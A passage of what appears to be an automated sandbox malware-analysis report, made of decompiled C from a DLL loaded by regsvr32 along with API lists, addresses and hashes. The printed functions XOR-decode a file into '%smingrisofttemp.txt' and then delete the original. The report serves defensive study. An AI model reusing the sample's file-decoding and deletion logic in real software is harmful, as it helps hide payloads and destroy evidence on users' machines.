						 *(_t268 - 4) = 5;
						E100222BB(_t268 - 0x58, __eflags);
						 *(_t268 - 4) = 7;
						__eflags = L100222D1(_t268 - 0x58, _t251,  *(_t268 - 0x14), 0, 0);
						if(__eflags != 0) {
							 *(_t268 - 4) = 6;
							_push(_t268 - 0x18);
							_t147 = E100227E5(_t268 - 0x58, _t251, __eflags);
							__eflags = _t147;
							if(_t147 != 0) {
								do {
									E10003480(4, _t268 - 0x1c, _t260, _t266, _t268,  *(_t268 - 0x18),  *((intOrPtr*)( *(_t268 - 0x18) - 0xc)));
									E10003480(4, _t268 - 0x1c, _t260, _t266, _t268, 0x10056fb0, 2);
									_t251 = _t268 - 0x18;
									_push(_t251);
									_t173 = E100227E5(_t268 - 0x58, _t251, __eflags);
									__eflags = _t173;
								} while (_t173 != 0);
								_t266 =  *((intOrPtr*)(_t268 - 0x1c));
							}
							E1001D2C4(E1001D1C2(_t260, 0x41e), _t266);
							E1001D2C4(_t260 + 0x78,  *(_t268 - 0x14));
							 *(_t268 - 4) = 5;
							E100226B2(4, _t268 - 0x58, _t251, _t260, _t266, __eflags);
							_t154 =  *(_t268 - 0x18) + 0xfffffff0;
							 *(_t268 - 4) = 4;
							asm("lock xadd [ecx], edx");
							_t253 = (_t251 | 0xffffffff) - 1;
							__eflags = _t253;
						} else {
							_t236 = _t268 - 0x58;
							 *(_t268 - 4) = 5;
							E100226B2(4, _t236, _t251, _t260, _t266, __eflags);
							_t154 =  *(_t268 - 0x18) + 0xfffffff0;
							 *(_t268 - 4) = 4;
							_t253 =  &(_t154[3]);
							asm("lock xadd [edx], ecx");
							__eflags = (_t236 | 0xffffffff) - 1;
						}
						if(__eflags <= 0) {
							_t253 =  *( *_t154);
							 *((intOrPtr*)( *((intOrPtr*)(_t253 + 4))))(_t154);
						}
						_t89 = _t266 - 0x10; // 0x0
						_t155 = _t89;
						 *(_t268 - 4) = 3;
						asm("lock xadd [ecx], edx");
						_t247 = (_t253 | 0xffffffff) - 1;
						__eflags = _t247;
						if(__eflags <= 0) {
							_t247 =  *( *_t155);
							 *((intOrPtr*)( *((intOrPtr*)(_t247 + 4))))(_t155);
						}
						 *(_t268 - 4) = 2;
						E100206EF(4, _t268 - 0x44, _t247, _t260, _t266, __eflags);
						 *(_t268 - 4) = 1;
						E100206EF(4, _t268 - 0x34, _t247, _t260, _t266, __eflags);
						_t159 =  &(( *(_t268 - 0x20))[0xfffffffffffffff0]);
						__eflags = _t159;
					} else {
						 *(_t268 - 4) = 2;
						E100206EF(_t180, _t268 - 0x44, _t247, _t260, _t264, __eflags);
						 *(_t268 - 4) = 1;
						E100206EF(_t180, _t268 - 0x34, _t247, _t260, _t264, __eflags);
						_t159 = _t180 - 0x10;
					}
				} else {
					_t21 = _t263 - 0x10; // 0x0
					_t159 = _t21;
				}
				 *(_t268 - 4) = 0;
				asm("lock xadd [ecx], edx");
				_t256 = (_t247 | 0xffffffff) - 1;
				if(_t256 <= 0) {
					_t256 =  *( *_t159);
					 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4))))(_t159);
				}
				_t161 =  &(( *(_t268 - 0x14))[0xfffffffffffffff0]);
				 *(_t268 - 4) = 0xffffffff;
				asm("lock xadd [ecx], edx");
				_t258 = (_t256 | 0xffffffff) - 1;
				if((_t256 | 0xffffffff) - 1 <= 0) {
					_t258 =  *( *_t161);
					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *( *_t161) + 4))))(_t161);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t268 - 0xc));
				_pop(_t261);
				_pop(_t267);
				_pop(_t182);
				return E1003B437(_t161, _t182,  *(_t268 + 0x200) ^ _t268, _t258, _t261, _t267);
			}









































                                                                                                                0x100038e1
                                                                                                                0x100038ee
                                                                                                                0x100038f0
                                                                                                                0x100038fb
                                                                                                                0x100038fc
                                                                                                                0x100038ff
                                                                                                                0x10003904
                                                                                                                0x10003906
                                                                                                                0x1000390f
                                                                                                                0x10003913
                                                                                                                0x10003919
                                                                                                                0x1000391c
                                                                                                                0x1000391e
                                                                                                                0x10003921
                                                                                                                0x10003928
                                                                                                                0x1000392a
                                                                                                                0x1000392f
                                                                                                                0x10003936
                                                                                                                0x10003936
                                                                                                                0x1000393b
                                                                                                                0x10003947
                                                                                                                0x1000394a
                                                                                                                0x10003951
                                                                                                                0x10003958
                                                                                                                0x1000395a
                                                                                                                0x1000395f
                                                                                                                0x10003966
                                                                                                                0x10003966
                                                                                                                0x10003974
                                                                                                                0x10003974
                                                                                                                0x10003977
                                                                                                                0x10003981
                                                                                                                0x10003985
                                                                                                                0x10003991
                                                                                                                0x1000399f
                                                                                                                0x100039a8
                                                                                                                0x100039ad
                                                                                                                0x100039b0
                                                                                                                0x100039c6
                                                                                                                0x100039cc
                                                                                                                0x100039ce
                                                                                                                0x100039d1
                                                                                                                0x100039d1
                                                                                                                0x100039da
                                                                                                                0x100039e2
                                                                                                                0x100039e6
                                                                                                                0x100039ee
                                                                                                                0x100039f0
                                                                                                                0x100039f2
                                                                                                                0x100039f6
                                                                                                                0x100039fa
                                                                                                                0x100039ff
                                                                                                                0x10003a01
                                                                                                                0x10003a06
                                                                                                                0x10003a0a
                                                                                                                0x10003a0c
                                                                                                                0x10003a11
                                                                                                                0x10003a13
                                                                                                                0x10003a35
                                                                                                                0x10003a43
                                                                                                                0x10003a56
                                                                                                                0x10003a5b
                                                                                                                0x10003a72
                                                                                                                0x10003a74
                                                                                                                0x10003a76
                                                                                                                0x10003a78
                                                                                                                0x10003a80
                                                                                                                0x10003a8a
                                                                                                                0x10003a91
                                                                                                                0x10003a94
                                                                                                                0x10003a94
                                                                                                                0x10003a80
                                                                                                                0x10003aa3
                                                                                                                0x10003aa8
                                                                                                                0x10003aa8
                                                                                                                0x10003aaf
                                                                                                                0x10003ab7
                                                                                                                0x10003abc
                                                                                                                0x10003ac0
                                                                                                                0x10003acb
                                                                                                                0x10003ada
                                                                                                                0x10003adf
                                                                                                                0x10003ae6
                                                                                                                0x10003ae8
                                                                                                                0x10003aed
                                                                                                                0x10003af4
                                                                                                                0x10003af4
                                                                                                                0x10003af9
                                                                                                                0x10003b02
                                                                                                                0x10003b02
                                                                                                                0x10003b05
                                                                                                                0x10003b0a
                                                                                                                0x10003b0d
                                                                                                                0x10003b14
                                                                                                                0x10003b16
                                                                                                                0x10003b19
                                                                                                                0x10003b1b
                                                                                                                0x10003b22
                                                                                                                0x10003b22
                                                                                                                0x10003b27
                                                                                                                0x10003b33
                                                                                                                0x10003b39
                                                                                                                0x10003b3d
                                                                                                                0x10003b4d
                                                                                                                0x10003b56
                                                                                                                0x10003b58
                                                                                                                0x10003b81
                                                                                                                0x10003bcc
                                                                                                                0x10003bd0
                                                                                                                0x10003bd5
                                                                                                                0x10003bd7
                                                                                                                0x10003be0
                                                                                                                0x10003beb
                                                                                                                0x10003bfa
                                                                                                                0x10003bff
                                                                                                                0x10003c02
                                                                                                                0x10003c06
                                                                                                                0x10003c0b
                                                                                                                0x10003c0b
                                                                                                                0x10003c0f
                                                                                                                0x10003c0f
                                                                                                                0x10003c21
                                                                                                                0x10003c2d
                                                                                                                0x10003c35
                                                                                                                0x10003c39
                                                                                                                0x10003c41
                                                                                                                0x10003c44
                                                                                                                0x10003c4d
                                                                                                                0x10003c51
                                                                                                                0x10003c52
                                                                                                                0x10003b5a
                                                                                                                0x10003b5a
                                                                                                                0x10003b5d
                                                                                                                0x10003b61
                                                                                                                0x10003b69
                                                                                                                0x10003b6c
                                                                                                                0x10003b6f
                                                                                                                0x10003b75
                                                                                                                0x10003b7a
                                                                                                                0x10003b7a
                                                                                                                0x10003c54
                                                                                                                0x10003c58
                                                                                                                0x10003c5e
                                                                                                                0x10003c5e
                                                                                                                0x10003c60
                                                                                                                0x10003c60
                                                                                                                0x10003c69
                                                                                                                0x10003c6d
                                                                                                                0x10003c71
                                                                                                                0x10003c72
                                                                                                                0x10003c74
                                                                                                                0x10003c78
                                                                                                                0x10003c7e
                                                                                                                0x10003c7e
                                                                                                                0x10003c83
                                                                                                                0x10003c87
                                                                                                                0x10003c8f
                                                                                                                0x10003c93
                                                                                                                0x10003c9b
                                                                                                                0x10003c9b
                                                                                                                0x10003a15
                                                                                                                0x10003a18
                                                                                                                0x10003a1c
                                                                                                                0x10003a24
                                                                                                                0x10003a28
                                                                                                                0x10003a2d
                                                                                                                0x10003a2d
                                                                                                                0x10003993
                                                                                                                0x10003993
                                                                                                                0x10003993
                                                                                                                0x10003993
                                                                                                                0x10003ca4
                                                                                                                0x10003ca8
                                                                                                                0x10003cac
                                                                                                                0x10003caf
                                                                                                                0x10003cb3
                                                                                                                0x10003cb9
                                                                                                                0x10003cb9
                                                                                                                0x10003cbe
                                                                                                                0x10003cc7
                                                                                                                0x10003cce
                                                                                                                0x10003cd2
                                                                                                                0x10003cd5
                                                                                                                0x10003cd9
                                                                                                                0x10003cdf
                                                                                                                0x10003cdf
                                                                                                                0x10003ce4
                                                                                                                0x10003cec
                                                                                                                0x10003ced
                                                                                                                0x10003cee
                                                                                                                0x10003d05

                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000001,00000080,00000000), ref: 100039C6
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100039D1
                                                                                                                • _memset.LIBCMT ref: 10003A43
                                                                                                                • _memset.LIBCMT ref: 10003A56
                                                                                                                • DeleteFileA.KERNEL32(?,?,00001002,00000000,?,00000000,00000000), ref: 10003AC0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File_memset$CloseCreateDeleteHandle
                                                                                                                • String ID: %smingrisofttemp.txt
                                                                                                                • API String ID: 3034448655-1600845768
                                                                                                                • Opcode ID: 8817c8e526d20c4fded9e5c1c55b0340626e69d5f3df592bf684f53e300378a9
                                                                                                                • Instruction ID: 67305b9a490d361d465055531ef015304d1f88d920b89ff78f097a6eb4034f25
                                                                                                                • Opcode Fuzzy Hash: 8817c8e526d20c4fded9e5c1c55b0340626e69d5f3df592bf684f53e300378a9
                                                                                                                • Instruction Fuzzy Hash: 11C1B135A00645AFEB05DBA8CC56FEEB7B8FF44350F148258F515AB2D6DB70AA04CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10003D10 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 324fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E10003D10(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t108;
				signed int _t109;
				intOrPtr* _t111;
				intOrPtr* _t115;
				void* _t120;
				signed int _t124;
				void* _t130;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				signed int** _t154;
				signed int** _t155;
				signed int _t159;
				char* _t161;
				signed int _t173;
				CHAR* _t180;
				void* _t182;
				signed int _t236;
				signed int _t247;
				signed int _t251;
				signed int _t253;
				signed int _t256;
				intOrPtr _t260;
				void* _t261;
				void* _t263;
				signed int _t265;
				intOrPtr _t266;
				void* _t267;
				signed int _t268;
				void* _t270;
				intOrPtr _t272;
				void* _t273;
				intOrPtr* _t276;
				intOrPtr* _t278;

				_t268 = _t270 - 0x204;
				_push(0xffffffff);
				_push(E10050F78);
				_push( *[fs:0x0]);
				_t272 = _t270 - 0x1b4;
				_t108 =  *0x1006dbdc; // 0xdf7c0cda
				_t109 = _t108 ^ _t268;
				 *(_t268 + 0x200) = _t109;
				_push(_t109);
				 *[fs:0x0] = _t268 - 0xc;
				 *((intOrPtr*)(_t268 - 0x10)) = _t272;
				_t260 = __ecx;
				 *((intOrPtr*)(_t268 - 0x24)) = __ecx;
				_t111 = E100173A6();
				_t276 = _t111;
				_t185 = 0 | _t276 == 0x00000000;
				if(_t276 == 0) {
					_t111 = E10001000(_t185, __edx, 0x80004005);
				}
				_t244 =  *_t111;
				 *(_t268 - 0x14) =  *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0xc))))() + 0x10;
				 *(_t268 - 4) = 0;
				_t115 = E100173A6();
				_t278 = _t115;
				_t188 = 0 | _t278 == 0x00000000;
				if(_t278 == 0) {
					_t115 = E10001000(_t188, _t244, 0x80004005);
				}
				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *_t115 + 0xc))))() + 0x10; // 0x10
				_t263 = _t14;
				 *(_t268 - 0x20) = _t263;
				 *(_t268 - 4) = 1;
				E1001ADCC(_t260 + 0x78, _t260, _t268 - 0x14);
				if( *((intOrPtr*)( *(_t268 - 0x14) - 0xc)) != 0) {
					_t247 = _t268 - 0x20;
					E10003500(_t247, "%smingrisofttemp.txt",  *((intOrPtr*)(_t260 + 0x74)));
					_t180 =  *(_t268 - 0x20);
					_t273 = _t272 + 0xc;
					_t120 = CreateFileA(_t180, 0x40000000, 2, 0, 1, 0x80, 0);
					__eflags = _t120;
					if(__eflags != 0) {
						CloseHandle(_t120);
					}
					E100205E2(_t268 - 0x34, __eflags);
					 *(_t268 - 4) = 2;
					E100205E2(_t268 - 0x44, __eflags);
					_push(0);
					_push(0);
					_push( *(_t268 - 0x14));
					 *(_t268 - 4) = 3;
					_t124 = E10020A24(_t268 - 0x34, _t247, __eflags);
					_push(0);
					_push(0x1002);
					_push(_t180);
					_t264 = _t124;
					E10020A24(_t268 - 0x44, _t247, __eflags);
					__eflags = _t124;
					if(__eflags != 0) {
						do {
							E1003BB70(_t260, _t268 + 0x180, 0, 0x80);
							E1003BB70(_t260, _t268 + 0x100, 0, 0x80);
							_t273 = _t273 + 0x18;
							_t265 = E100202F0(_t268 - 0x34, _t268 + 0x180, 0x80);
							_t130 = 0;
							__eflags = _t265;
							if(_t265 > 0) {
								do {
									 *(_t268 + _t130 + 0x100) =  *(_t268 + _t130 + 0x180) ^ 0x00000002;
									_t130 = _t130 + 1;
									__eflags = _t130 - _t265;
								} while (_t130 < _t265);
							}
							E10020330(_t268 - 0x44, _t268 + 0x100, _t265);
							__eflags = _t265;
						} while (_t265 != 0);
						E10020580(_t180, _t268 - 0x34);
						E10020580(_t180, _t268 - 0x44);
						_t249 =  *(_t268 - 0x14);
						DeleteFileA( *(_t268 - 0x14));
						E1003BB37(_t180,  *(_t268 - 0x14));
						E1002181C(_t180, _t260, _t265, __eflags, 0x10056ffc, _t265, _t265);
						_t138 = E100173A6();
						__eflags = _t138;
						_t204 = 0 | __eflags != 0x00000000;
						if(__eflags == 0) {
							_t138 = E10001000(_t204, _t249, 0x80004005);
						}
						_t250 =  *_t138;
						_t54 =  *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0xc))))() + 0x10; // 0x10
						_t266 = _t54;
						 *((intOrPtr*)(_t268 - 0x1c)) = _t266;
						 *(_t268 - 4) = 4;
						_t141 = E100173A6();
						__eflags = _t141;
						_t207 = 0 | __eflags != 0x00000000;
						__eflags = __eflags != 0;
						if(__eflags == 0) {
							_t141 = E10001000(_t207, _t250, 0x80004005);
						}
						_t251 =  *_t141;
						 *(_t268 - 0x18) =  *((intOrPtr*)( *((intOrPtr*)(_t251 + 0xc))))() + 0x10;
						 *(_t268 - 4) = 5;
						E100222BB(_t268 - 0x58, __eflags);
						 *(_t268 - 4) = 7;
						__eflags = L100222D1(_t268 - 0x58, _t251,  *(_t268 - 0x14), 0, 0);
						if(__eflags != 0) {
							 *(_t268 - 4) = 6;
							_push(_t268 - 0x18);
							_t147 = E100227E5(_t268 - 0x58, _t251, __eflags);
							__eflags = _t147;
							if(_t147 != 0) {
								do {
									E10003480(4, _t268 - 0x1c, _t260, _t266, _t268,  *(_t268 - 0x18),  *((intOrPtr*)( *(_t268 - 0x18) - 0xc)));
									E10003480(4, _t268 - 0x1c, _t260, _t266, _t268, 0x10056fb0, 2);
									_t251 = _t268 - 0x18;
									_push(_t251);
									_t173 = E100227E5(_t268 - 0x58, _t251, __eflags);
									__eflags = _t173;
								} while (_t173 != 0);
								_t266 =  *((intOrPtr*)(_t268 - 0x1c));
							}
							E1001D2C4(E1001D1C2(_t260, 0x41e), _t266);
							E1001D2C4(_t260 + 0x78,  *(_t268 - 0x14));
							 *(_t268 - 4) = 5;
							E100226B2(4, _t268 - 0x58, _t251, _t260, _t266, __eflags);
							_t154 =  *(_t268 - 0x18) + 0xfffffff0;
							 *(_t268 - 4) = 4;
							asm("lock xadd [ecx], edx");
							_t253 = (_t251 | 0xffffffff) - 1;
							__eflags = _t253;
						} else {
							_t236 = _t268 - 0x58;
							 *(_t268 - 4) = 5;
							E100226B2(4, _t236, _t251, _t260, _t266, __eflags);
							_t154 =  *(_t268 - 0x18) + 0xfffffff0;
							 *(_t268 - 4) = 4;
							_t253 =  &(_t154[3]);
							asm("lock xadd [edx], ecx");
							__eflags = (_t236 | 0xffffffff) - 1;
						}
						if(__eflags <= 0) {
							_t253 =  *( *_t154);
							 *((intOrPtr*)( *((intOrPtr*)(_t253 + 4))))(_t154);
						}
						_t89 = _t266 - 0x10; // 0x0
						_t155 = _t89;
						 *(_t268 - 4) = 3;
						asm("lock xadd [ecx], edx");
						_t247 = (_t253 | 0xffffffff) - 1;
						__eflags = _t247;
						if(__eflags <= 0) {
							_t247 =  *( *_t155);
							 *((intOrPtr*)( *((intOrPtr*)(_t247 + 4))))(_t155);
						}
						 *(_t268 - 4) = 2;
						E100206EF(4, _t268 - 0x44, _t247, _t260, _t266, __eflags);
						 *(_t268 - 4) = 1;
						E100206EF(4, _t268 - 0x34, _t247, _t260, _t266, __eflags);
						_t159 =  &(( *(_t268 - 0x20))[0xfffffffffffffff0]);
						__eflags = _t159;
					} else {
						 *(_t268 - 4) = 2;
						E100206EF(_t180, _t268 - 0x44, _t247, _t260, _t264, __eflags);
						 *(_t268 - 4) = 1;
						E100206EF(_t180, _t268 - 0x34, _t247, _t260, _t264, __eflags);
						_t159 = _t180 - 0x10;
					}
				} else {
					_t21 = _t263 - 0x10; // 0x0
					_t159 = _t21;
				}
				 *(_t268 - 4) = 0;
				asm("lock xadd [ecx], edx");
				_t256 = (_t247 | 0xffffffff) - 1;
				if(_t256 <= 0) {
					_t256 =  *( *_t159);
					 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4))))(_t159);
				}
				_t161 =  &(( *(_t268 - 0x14))[0xfffffffffffffff0]);
				 *(_t268 - 4) = 0xffffffff;
				asm("lock xadd [ecx], edx");
				_t258 = (_t256 | 0xffffffff) - 1;
				if((_t256 | 0xffffffff) - 1 <= 0) {
					_t258 =  *( *_t161);
					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *( *_t161) + 4))))(_t161);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t268 - 0xc));
				_pop(_t261);
				_pop(_t267);
				_pop(_t182);
				return E1003B437(_t161, _t182,  *(_t268 + 0x200) ^ _t268, _t258, _t261, _t267);
			}









































                                                                                                                0x10003d11
                                                                                                                0x10003d1e
                                                                                                                0x10003d20
                                                                                                                0x10003d2b
                                                                                                                0x10003d2c
                                                                                                                0x10003d2f
                                                                                                                0x10003d34
                                                                                                                0x10003d36
                                                                                                                0x10003d3f
                                                                                                                0x10003d43
                                                                                                                0x10003d49
                                                                                                                0x10003d4c
                                                                                                                0x10003d4e
                                                                                                                0x10003d51
                                                                                                                0x10003d58
                                                                                                                0x10003d5a
                                                                                                                0x10003d5f
                                                                                                                0x10003d66
                                                                                                                0x10003d66
                                                                                                                0x10003d6b
                                                                                                                0x10003d77
                                                                                                                0x10003d7a
                                                                                                                0x10003d81
                                                                                                                0x10003d88
                                                                                                                0x10003d8a
                                                                                                                0x10003d8f
                                                                                                                0x10003d96
                                                                                                                0x10003d96
                                                                                                                0x10003da4
                                                                                                                0x10003da4
                                                                                                                0x10003da7
                                                                                                                0x10003db1
                                                                                                                0x10003db5
                                                                                                                0x10003dc1
                                                                                                                0x10003dcf
                                                                                                                0x10003dd8
                                                                                                                0x10003ddd
                                                                                                                0x10003de0
                                                                                                                0x10003df6
                                                                                                                0x10003dfc
                                                                                                                0x10003dfe
                                                                                                                0x10003e01
                                                                                                                0x10003e01
                                                                                                                0x10003e0a
                                                                                                                0x10003e12
                                                                                                                0x10003e16
                                                                                                                0x10003e1e
                                                                                                                0x10003e20
                                                                                                                0x10003e22
                                                                                                                0x10003e26
                                                                                                                0x10003e2a
                                                                                                                0x10003e2f
                                                                                                                0x10003e31
                                                                                                                0x10003e36
                                                                                                                0x10003e3a
                                                                                                                0x10003e3c
                                                                                                                0x10003e41
                                                                                                                0x10003e43
                                                                                                                0x10003e65
                                                                                                                0x10003e73
                                                                                                                0x10003e86
                                                                                                                0x10003e8b
                                                                                                                0x10003ea2
                                                                                                                0x10003ea4
                                                                                                                0x10003ea6
                                                                                                                0x10003ea8
                                                                                                                0x10003eb0
                                                                                                                0x10003eba
                                                                                                                0x10003ec1
                                                                                                                0x10003ec4
                                                                                                                0x10003ec4
                                                                                                                0x10003eb0
                                                                                                                0x10003ed3
                                                                                                                0x10003ed8
                                                                                                                0x10003ed8
                                                                                                                0x10003edf
                                                                                                                0x10003ee7
                                                                                                                0x10003eec
                                                                                                                0x10003ef0
                                                                                                                0x10003efb
                                                                                                                0x10003f0a
                                                                                                                0x10003f0f
                                                                                                                0x10003f16
                                                                                                                0x10003f18
                                                                                                                0x10003f1d
                                                                                                                0x10003f24
                                                                                                                0x10003f24
                                                                                                                0x10003f29
                                                                                                                0x10003f32
                                                                                                                0x10003f32
                                                                                                                0x10003f35
                                                                                                                0x10003f3a
                                                                                                                0x10003f3d
                                                                                                                0x10003f44
                                                                                                                0x10003f46
                                                                                                                0x10003f49
                                                                                                                0x10003f4b
                                                                                                                0x10003f52
                                                                                                                0x10003f52
                                                                                                                0x10003f57
                                                                                                                0x10003f63
                                                                                                                0x10003f69
                                                                                                                0x10003f6d
                                                                                                                0x10003f7d
                                                                                                                0x10003f86
                                                                                                                0x10003f88
                                                                                                                0x10003fb1
                                                                                                                0x10003ffc
                                                                                                                0x10004000
                                                                                                                0x10004005
                                                                                                                0x10004007
                                                                                                                0x10004010
                                                                                                                0x1000401b
                                                                                                                0x1000402a
                                                                                                                0x1000402f
                                                                                                                0x10004032
                                                                                                                0x10004036
                                                                                                                0x1000403b
                                                                                                                0x1000403b
                                                                                                                0x1000403f
                                                                                                                0x1000403f
                                                                                                                0x10004051
                                                                                                                0x1000405d
                                                                                                                0x10004065
                                                                                                                0x10004069
                                                                                                                0x10004071
                                                                                                                0x10004074
                                                                                                                0x1000407d
                                                                                                                0x10004081
                                                                                                                0x10004082
                                                                                                                0x10003f8a
                                                                                                                0x10003f8a
                                                                                                                0x10003f8d
                                                                                                                0x10003f91
                                                                                                                0x10003f99
                                                                                                                0x10003f9c
                                                                                                                0x10003f9f
                                                                                                                0x10003fa5
                                                                                                                0x10003faa
                                                                                                                0x10003faa
                                                                                                                0x10004084
                                                                                                                0x10004088
                                                                                                                0x1000408e
                                                                                                                0x1000408e
                                                                                                                0x10004090
                                                                                                                0x10004090
                                                                                                                0x10004099
                                                                                                                0x1000409d
                                                                                                                0x100040a1
                                                                                                                0x100040a2
                                                                                                                0x100040a4
                                                                                                                0x100040a8
                                                                                                                0x100040ae
                                                                                                                0x100040ae
                                                                                                                0x100040b3
                                                                                                                0x100040b7
                                                                                                                0x100040bf
                                                                                                                0x100040c3
                                                                                                                0x100040cb
                                                                                                                0x100040cb
                                                                                                                0x10003e45
                                                                                                                0x10003e48
                                                                                                                0x10003e4c
                                                                                                                0x10003e54
                                                                                                                0x10003e58
                                                                                                                0x10003e5d
                                                                                                                0x10003e5d
                                                                                                                0x10003dc3
                                                                                                                0x10003dc3
                                                                                                                0x10003dc3
                                                                                                                0x10003dc3
                                                                                                                0x100040d4
                                                                                                                0x100040d8
                                                                                                                0x100040dc
                                                                                                                0x100040df
                                                                                                                0x100040e3
                                                                                                                0x100040e9
                                                                                                                0x100040e9
                                                                                                                0x100040ee
                                                                                                                0x100040f7
                                                                                                                0x100040fe
                                                                                                                0x10004102
                                                                                                                0x10004105
                                                                                                                0x10004109
                                                                                                                0x1000410f
                                                                                                                0x1000410f
                                                                                                                0x10004114
                                                                                                                0x1000411c
                                                                                                                0x1000411d
                                                                                                                0x1000411e
                                                                                                                0x10004135

                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000001,00000080,00000000), ref: 10003DF6
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10003E01
                                                                                                                • _memset.LIBCMT ref: 10003E73
                                                                                                                • _memset.LIBCMT ref: 10003E86
                                                                                                                • DeleteFileA.KERNEL32(?,?,00001002,00000000,?,00000000,00000000), ref: 10003EF0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File_memset$CloseCreateDeleteHandle
                                                                                                                • String ID: %smingrisofttemp.txt
                                                                                                                • API String ID: 3034448655-1600845768
                                                                                                                • Opcode ID: f89dcb604309794579d6de992991a3d4f8310fefd3ec1bcbd63f55cd254091b4
                                                                                                                • Instruction ID: a47a00b9d9cd77ccd803d6ac4688e9de417d713599904eb0560c35611f0cdbec
                                                                                                                • Opcode Fuzzy Hash: f89dcb604309794579d6de992991a3d4f8310fefd3ec1bcbd63f55cd254091b4
                                                                                                                • Instruction Fuzzy Hash: FEC1B175900245AFEB05DBA8CC52FEEB7B5EF44350F108258F515AB2D6DB30AA04CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002994E Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 62%
                                                                                                                			E1002994E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t133;
				intOrPtr* _t140;
				int _t145;
				signed short _t148;
				short* _t149;
				intOrPtr _t152;
				signed short _t177;
				intOrPtr _t178;
				signed int _t179;
				intOrPtr _t184;
				struct tagRECT _t189;
				int _t190;
				void* _t191;
				signed short _t193;
				signed short _t194;
				void* _t195;
				void* _t221;
				intOrPtr _t225;
				short _t226;
				intOrPtr* _t233;
				void* _t234;
				signed short* _t236;
				signed int _t240;
				void* _t241;
				signed short* _t242;
				signed short* _t244;
				signed short* _t245;
				signed int _t246;
				void* _t248;

				_t246 = _t248 - 0x44;
				_t133 =  *0x1006dbdc; // 0xdf7c0cda
				 *(_t246 + 0x48) = _t133 ^ _t246;
				_push(0x50);
				E1003D1E6(E10053E02, __ebx, __edi, __esi);
				_t233 =  *((intOrPtr*)(_t246 + 0x60));
				_t236 =  *(_t246 + 0x68);
				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
				 *(_t246 + 8) =  *(_t246 + 0x58);
				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
				_t140 = _t233 + 0x12;
				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
					 *((short*)(_t246 - 0x12)) =  *_t140;
					_t225 = _t233 + 0x18;
					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
					_t233 = _t246 - 0x20;
					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
				}
				_t226 =  *((short*)(_t233 + 0xa));
				_t189 =  *((short*)(_t233 + 8));
				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
				 *(_t246 - 0x30) = _t189;
				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
